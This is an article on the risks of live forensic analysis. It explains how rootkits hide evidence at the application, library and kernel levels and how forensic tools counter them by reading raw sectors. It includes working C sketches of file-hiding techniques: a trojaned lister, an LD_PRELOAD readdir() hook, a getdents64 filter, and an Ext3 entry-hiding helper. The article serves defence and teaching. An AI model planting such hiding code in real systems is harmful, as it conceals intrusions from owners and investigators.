
Risks of Live Digital Forensic Analysis

Live analysis tools have made a significant difference in capturing evidence during forensic investigations. Such tools, however, are far from infallible.

Your network intrusion detection system (NIDS) generates an alert that an attack has been launched against an internal server. You deploy the incident response team and they are faced with a dilemma. Do they turn the system off and analyze it or do they analyze it while it is still running? The server is used by hundreds of users and therefore powering it off would cause a loss in productivity, yet the reliability of data from a live, compromised system is questionable.

This is a common challenge in many environments, and there is a trade-off between the availability of a system and the reliability of the investigation’s conclusions. This trade-off has existed since computer investigations were first conducted, but the techniques attackers use to hide themselves are becoming more advanced, more attack alerts are being generated, and commercial tools now exist to analyze live systems.

This article examines the area of live analysis and the methods attackers use to hide evidence from investigators. It then examines the countermeasures that live analysis tools use, along with their shortcomings and future directions.



The Physical World

When considering new issues in digital investigations, I find it useful to examine a similar issue in physical-world investigations. Therefore, I present this analogy:

A murder has occurred in a large hotel and the police are called. The only responder is a detective, and he talks to the manager, who informs him that the murder occurred in room 716 and that the guests must not be disturbed. The detective therefore cannot restrict access to any part of the hotel. Further, the manager refuses to give the detective direct access to any hotel rooms. When the detective is interested in a specific room, he must locate a staff member and direct him or her to, for example, look for a specific object, describe the room, or take a digital picture.1

The detective goes to room 716, locates a hotel staff member, and asks him to go into the room and take some pictures. The staff member comes out a couple of minutes later. The detective views the digital pictures and concludes the victim was shot, but does not see a gun. He directs the staff member to go back inside and look under the furniture for it. The staff member goes back in, comes out a few minutes later, and reports that he could not find the gun.

To many, this process seems absurd. The crime scene is not secured, the identity of the staff member is unknown, and he could be involved with the incident. Maybe there are more bodies in the room, or maybe the gun was in the room but the staff member kept it out of the initial pictures and hid it in his pocket. It would be difficult for the detective to confidently conclude that the murder weapon was not in the room. I propose this scenario is similar to the live analysis of a computer.


The Digital World

A digital investigation is a process to answer questions about the current or previous states of digital data and about previous digital events. It could be initiated because, for example, a corporate user violated a usage policy or an attacker compromised a system.

Digital investigations can involve dead and/or live analysis techniques. Live analysis techniques use software that existed on the system during the timeframe being investigated. This is in contrast to dead analysis techniques, which use no software that existed on the system during that timeframe.

In the opening example about whether or not to turn off a system, a live analysis would occur if the system were kept running and the response team members used the OS and other local applications to view log files and account information. A dead analysis would occur if the system was powered off, an image copy of the hard disk was made, and the image was analyzed in a lab using a trusted OS and applications.

It should be noted that this definition of dead analysis is quite strict because many hardware devices contain software. Therefore, when a hard disk is removed from a suspect system and plugged into an independent analysis system to make an image copy, we are, strictly speaking, performing live analysis because the hard disk contains firmware that existed during the incident. However, it is beyond the scope of this article to discuss the different levels of live and dead analyses.

While the idea of live analysis is most commonly associated with incident response, it actually occurs every day on most computers when anti-virus software scans a file system looking for a virus infection. The anti-virus software, associated signature database, and OS existed during the potential virus infection and are being used to search out the virus.

Live analysis frequently occurs because it is too expensive to power the system off and boot into a trusted environment each time data needs to be analyzed. For example, the incident response team will likely want to confirm an NIDS alert using live analysis techniques because many of the alerts are false positives and therefore the critical server could be offline for several hours for nothing. In other cases, live analysis is used because the investigator does not want the user being investigated to suspect an investigation is under way.

The only difference between live and dead analysis is the reliability of the results. The same types of data can be analyzed using dead and live analysis techniques, but the live analysis techniques rely on applications that could have been modified to produce false data.


Sources of False Data

The most common source of false data during live analysis is from rootkits, described as “Trojan horse backdoor tools that modify existing operating system software so that an attacker can keep access to and hide on a machine” [9]. A rootkit hides the attacker by inserting a filter in the data flow of a computer. For example, when the investigator wants to look at the files in a directory, she uses an application to request the list from the OS. The list is passed through several pieces of software before it is displayed, and at any point a filter could exist that removes the name of a file that contains evidence. Figure 1 illustrates how an attacker tries to hide a file named “passwords.txt.” The filter in the system looks for this file name, among others, and removes it from the output list. The file exists on the system, but the investigator never sees it.

There are various locations where attackers have installed filters. Consider the typical data flow path of most computers, as shown in Figure 2. The user interfaces with an application, which may use dynamic libraries installed on the system. The library or application uses system calls to interface with the kernel, which in turn has direct access to kernel memory and storage locations, such as hard disks and networks. These are the locations that contain evidence that an investigator wants to see.

Rootkits have been developed for each of the major interfaces. The most primitive rootkits were application-level rootkits, or user-mode rootkits, which replaced system executables with Trojan versions that would not display file names, process names, open ports, or system configuration values. One of the problems with this approach is that multiple applications can be used to obtain the same data, and therefore all of those applications must be replaced. For example, to hide file names on a Unix system, the ls command must be replaced, as well as the shell, find, and du. The bottom of Figure 2 shows an example where the passwords.txt name is passed through each layer until the application filters it out.
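To make the filtering concrete, here is a minimal sketch of an application-level filter: a trojaned directory lister, written in C, that behaves like ls except that it silently skips a hard-coded name. The hidden name and the program itself are illustrative, not taken from any particular rootkit.

    /* Illustrative application-level rootkit filter: a trojaned
     * directory lister that omits a hard-coded file name. The
     * hidden name "passwords.txt" is hypothetical. */
    #include <dirent.h>
    #include <stdio.h>
    #include <string.h>

    int main(int argc, char *argv[])
    {
        const char *path = (argc > 1) ? argv[1] : ".";
        DIR *dir = opendir(path);
        if (dir == NULL) {
            perror("opendir");
            return 1;
        }
        struct dirent *entry;
        while ((entry = readdir(dir)) != NULL) {
            /* The filter: the file exists on disk but is never shown. */
            if (strcmp(entry->d_name, "passwords.txt") == 0)
                continue;
            puts(entry->d_name);
        }
        closedir(dir);
        return 0;
    }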

A different approach went one layer down and modified the libraries. A common filtering technique is to replace a library with a wrapper, which exposes the same API functions as the original library. When the modified library function is called, it calls the original library, which makes the necessary system calls and processes the data. The modified library then filters the data returned by the original library before passing it back to the application.
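On a Linux system, for example, this kind of wrapper does not even require replacing the library file. The sketch below uses the dynamic linker's LD_PRELOAD mechanism to interpose on readdir(); the hidden name is again hypothetical, and the sketch assumes a glibc-style environment.

    /* Illustrative library-level filter: a shared object that wraps
     * readdir() and drops one hard-coded name. Built and activated
     * with something like:
     *   gcc -shared -fPIC -o filter.so filter.c -ldl
     *   LD_PRELOAD=./filter.so ls /tmp
     * (Linux-specific; the hidden name is hypothetical.) */
    #define _GNU_SOURCE
    #include <dirent.h>
    #include <dlfcn.h>
    #include <string.h>

    struct dirent *readdir(DIR *dir)
    {
        /* Locate the real readdir() in the original library. */
        static struct dirent *(*real_readdir)(DIR *);
        if (real_readdir == NULL)
            real_readdir = (struct dirent *(*)(DIR *))
                           dlsym(RTLD_NEXT, "readdir");

        struct dirent *entry;
        while ((entry = real_readdir(dir)) != NULL) {
            /* Filter the data returned by the original library. */
            if (strcmp(entry->d_name, "passwords.txt") != 0)
                break;
        }
        return entry;  /* NULL at end of directory, as usual */
    }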

The next step was to place the rootkit in the kernel, and there have been several approaches to doing this [6, 9]. One approach was to use loadable kernel modules or device drivers, which many OSs support so that the kernel does not need to be recompiled when new hardware or software is used. Like the library rootkits, these typically work as wrappers around the original system calls: the rootkit code calls the system calls and then filters the return data.

Another approach to installing the wrappers around the system calls is to directly modify the system call table in kernel memory while it is running. Alternatively, an attacker can modify the disk version of the kernel image so that the Trojan version is used the next time the system is booted. In all cases, the actual evidence exists in the system, but at some point in the kernel the data is filtered to remove specific entries.
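The filtering step such a kernel wrapper performs can be illustrated in user space. The sketch below (Linux-specific; the hidden name is hypothetical) fetches raw directory records with the getdents64() system call and then splices one record out of the returned buffer, which is the same transformation a kernel-level wrapper would apply before the data reaches the application.

    /* User-space illustration of what a kernel getdents() wrapper
     * does: obtain the raw directory records, then splice out one
     * record before the caller ever sees it. Linux-specific. */
    #define _GNU_SOURCE
    #include <fcntl.h>
    #include <stdio.h>
    #include <string.h>
    #include <sys/syscall.h>
    #include <unistd.h>

    struct linux_dirent64 {
        unsigned long long d_ino;
        long long          d_off;
        unsigned short     d_reclen;   /* size of this record */
        unsigned char      d_type;
        char               d_name[];
    };

    int main(void)
    {
        char buf[4096];
        int fd = open(".", O_RDONLY | O_DIRECTORY);
        long n = syscall(SYS_getdents64, fd, buf, sizeof(buf));

        for (long pos = 0; pos < n; ) {
            struct linux_dirent64 *d = (struct linux_dirent64 *)(buf + pos);
            unsigned short reclen = d->d_reclen;
            if (strcmp(d->d_name, "passwords.txt") == 0) {
                /* The filter: shift later records over this one. */
                memmove(buf + pos, buf + pos + reclen, n - pos - reclen);
                n -= reclen;
                continue;   /* re-examine the record now at pos */
            }
            puts(d->d_name);
            pos += reclen;
        }
        close(fd);
        return 0;
    }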


Countermeasures

There are several countermeasures that exist to deal with rootkits. To counter application-level rootkits, an investigator can use a CD of trusted tools that he or she knows have not been modified. To counter library-level rootkits, an investigator can make sure the trusted tools on the CD are statically compiled so they do not use the Trojan libraries. However, on some systems it is not possible to make executables fully static and some libraries are required.

Countering the kernel-level rootkits is a more difficult problem because applications cannot access kernel memory or storage devices without the help of the kernel. There is a countermeasure that has, thus far, not been vulnerable to known rootkits. Typically, applications obtain specific types of data using specific system calls. For example, in Linux, the files in a directory are obtained using the getdents() system call, which uses file system-specific code to locate the sectors where the directory contents are stored and process the directory data structures. The system call then returns a list of files in organized data structures. The typical rootkit will modify the list of data structures after the file system code has processed the raw data. An example is shown in the top of Figure 3, which shows the communication sequence for an application requesting the contents of directory /tmp/. The kernel determines it needs to read sector 500, where the root directory contents are stored. The kernel processes the contents of sector 500 to find the entry for the tmp directory and then determines that the contents of the directory are in sector 812. The kernel reads the sector, processes the contents, and returns the list of files to the application.

The countermeasure is for the analysis application to rely less on the kernel and system calls. Instead of using the file system code in the kernel to determine where a directory is located and what files lie within, the application uses its own file system code. In fact, the application uses system calls only to read raw sectors, as illustrated in the bottom of Figure 3. It determines that it needs to read the root directory from sector 500 and uses the read system call to obtain its contents. The kernel reads the sector and returns the content. The application processes the contents and requests additional read operations until the directory contents are known. Several live analysis tools use this type of analysis technique when they process file system data [2, 5, 10]; it is similar to the approach used by the cross-view rootkit detection tools [4, 12].
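A minimal sketch of this approach is shown below: the tool asks the kernel for nothing but raw sectors and supplies its own file system logic. The device path, sector size, and sector numbers are placeholders; tools such as The Sleuth Kit layer complete FAT, NTFS, and Ext parsers over reads like this one.

    /* Minimal sketch of the raw-read countermeasure: only the basic
     * read calls go through the kernel; the file system structures
     * are interpreted by the tool itself. Paths and sector numbers
     * are placeholders. */
    #include <fcntl.h>
    #include <stdint.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>

    #define SECTOR_SIZE 512

    /* Fetch one raw sector using nothing but open()/pread(). */
    static int read_sector(int fd, uint64_t sector, uint8_t *buf)
    {
        off_t off = (off_t)(sector * SECTOR_SIZE);
        return pread(fd, buf, SECTOR_SIZE, off) == SECTOR_SIZE ? 0 : -1;
    }

    int main(int argc, char *argv[])
    {
        if (argc != 3) {
            fprintf(stderr, "usage: %s <raw-device-or-image> <sector>\n",
                    argv[0]);
            return 1;
        }
        int fd = open(argv[1], O_RDONLY);
        if (fd < 0) { perror("open"); return 1; }

        uint8_t sec[SECTOR_SIZE];
        if (read_sector(fd, strtoull(argv[2], NULL, 10), sec) != 0) {
            perror("pread");
            close(fd);
            return 1;
        }
        /* From here, the tool's own file system code -- not the
         * kernel's -- would parse the directory structures in sec[]
         * and request further sectors as needed. */
        printf("sector read; first bytes: %02x %02x %02x %02x\n",
               sec[0], sec[1], sec[2], sec[3]);
        close(fd);
        return 0;
    }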

This analysis approach makes it more difficult to introduce false data because a kernel-based rootkit must edit the sector contents in kernel memory. Therefore, it must wrap itself around the read system call and identify the relevant sectors, either by keeping track of which sectors contain sensitive data or by scanning each sector for keywords. Either way, this is more overhead than the previous rootkits required.

When the kernel rootkit finds the data it wants to hide, it must next determine how to remove the data from the sector, which is a file system-specific operation because various data structures will need to be changed so that the analysis tool does not detect inconsistent data. For example, if an NTFS file is being hidden, then the file’s name entry in a B-tree index must be removed and the index re-sorted (which may use sectors that the kernel has not yet read) [1]. If an Ext3 file is being hidden, then the file’s name entry in a linked list of file names must be either removed from the list or marked as unallocated. Specialized analysis tools will show unallocated file names, so the unallocated name may also need to be changed to something more generic and the inode address value cleared. Note, however, that we have now created an inconsistent file system. If fsck or scandisk were run on the file system, the rootkit may prevent these tools, too, from seeing the hidden file names; the consistency checkers would then find no allocated name for the allocated Ext3 inodes or NTFS Master File Table (MFT) entries where the hidden data is stored, and would therefore delete the hidden file content or assign a new name to the content, which may not be hidden by the rootkit.
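For the Ext3 case, the on-disk record the rootkit would have to manipulate looks roughly like the sketch below (field layout per the standard Ext2/Ext3 directory entry format; the hide_entry() helper is a hypothetical illustration). Even this simple case shows how much file system-specific bookkeeping is required.

    /* The Ext2/Ext3 on-disk directory entry the rootkit must edit.
     * Layout follows the standard Ext2/Ext3 directory format; the
     * hide_entry() helper is a hypothetical sketch. */
    #include <stdint.h>
    #include <string.h>

    struct ext3_dir_entry {
        uint32_t inode;     /* inode address; cleared when unused   */
        uint16_t rec_len;   /* bytes to the next entry in the block */
        uint8_t  name_len;  /* length of the name that follows      */
        uint8_t  file_type;
        char     name[];    /* file name, not NUL-terminated        */
    };

    /* "Unallocate" an entry the way unlink() does -- the previous
     * entry's rec_len is extended to jump over the victim -- and
     * then also sanitize the fields a forensic tool would show. */
    static void hide_entry(struct ext3_dir_entry *prev,
                           struct ext3_dir_entry *victim)
    {
        prev->rec_len += victim->rec_len;             /* skip entry   */
        victim->inode = 0;                            /* clear inode  */
        memset(victim->name, 'x', victim->name_len);  /* generic name */
    }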

It is not impossible to hide a file completely, but the work becomes much more significant with this countermeasure because the rootkit must examine all data the system reads and it must have support for various file system types. This increases the rootkit’s size and performance impact.


Future Directions

Because the architecture of production OSs prevents applications from accessing kernel memory and storage devices without using the kernel, kernel-based rootkits will always be a threat to live analysis. Future directions in live analysis techniques involve the use of specialized hardware to collect the raw memory and storage data for a dead analysis. For example, the Tribble system [3] is a PCI card that can make a copy of physical memory using DMA requests and does not rely on the kernel. Therefore, even if the kernel has been modified to hide open network ports or running processes, the network and process data will still exist in the memory image, which can be analyzed on a trusted system. Another related example is the Copilot system—a hardware-based rootkit detection system [8].

A longer-term approach is to change system design such that software components can be better isolated. This would allow some components to be trusted in the event of an incident and be used to analyze the compromised components. For example, if the system being investigated is running as a virtual machine, then the host system can accurately copy memory and the hard disk (if we can show that it too has not been compromised). Such a design may also allow other components to continue running as normal during an investigation, similar to how access to part, but not all, of a large building may be restricted during an investigation.


Conclusion

Live analysis may not produce reliable results, but it is useful in some cases. If we return to the hotel analogy, we would likely not find it acceptable for the detective to have such restricted access, because the case is a murder and therefore an important investigation. If the investigation were instead about a guest who lost his hat and was searching for it, then we may find it acceptable that the detective is not given access to everyone’s room and is not able to isolate the various parts of the hotel where the guest thought he left it.

Digital investigations are similar: some incidents will be too important to risk using live analysis techniques, such as incidents that involve sensitive data or that may result in legal action. To date, there is more legal precedent for entering digital evidence from dead analysis than from live analysis. On the other hand, if, for example, many computers are involved in an incident and their status must be identified quickly, then live analysis can save time.

As Thompson made clear with his work on compilers: “You can’t trust code that you did not totally create yourself” [11]. Obviously, this is still true today, especially when dealing with code that was created by someone with malicious intent.


Figures

F1 Figure 1. Rootkits filter various types of data in different locations in the data path and remove data that could be evidence.

F2 Figure 2. An example of a typical data flow in a computer system. The bottom shows an application-level rootkit.

F3 Figure 3. An application can avoid some kernel rootkits by not using the standard system calls and instead using only the basic read calls and processing the raw data.

References

    1. Carrier, B.D. File System Forensic Analysis. Addison Wesley, 2005.

    2. Carrier, B.D. The Sleuth Kit; www.sleuthkit.org/.

    3. Carrier, B.D. and Grand, J. A hardware-based memory acquisition procedure for digital investigations. J. Digital Investigation 1, 1 (Mar. 2004).

    4. Cogswell, B. and Russinovich, M. RootkitRevealer; www.sysinternals.com.

    5. Guidance Software. EnCase Enterprise; www.encase.com.

    6. Hoglund, G. and Butler, J. Rootkits: Subverting the Windows Kernel. Addison Wesley, 2005.

    7. Mandia, K., Prosise, C., and Pepe, M. Incident Response and Computer Forensics, 2nd Ed. McGraw-Hill, 2003.

    8. Petroni, Jr., N.L., Fraser, T., Molina, J., and Arbaugh, W.A. Copilot—A coprocessor-based kernel runtime integrity monitor. In Proceedings of 13th Annual USENIX Security Symposium (Aug. 2004).

    9. Skoudis, E. Malware: Fighting Malicious Code. Prentice Hall, 2004.

    10. Technology Pathways. ProDiscover Incident Response; www.techpathways.com/.

    11. Thompson, K. Reflections on trusting trust. Commun. ACM 27, 8 (Aug. 1984).

    12. Wang, Y.-M., Beck, D., Vo, B., Roussev, R., and Verbowski, C. Detecting stealth software with Strider GhostBuster. In Proceedings of the 2005 International Conference on Dependable Systems and Networks (June 2005).

Footnotes

    1. Obviously, there are laws in most countries that would prevent this scenario.
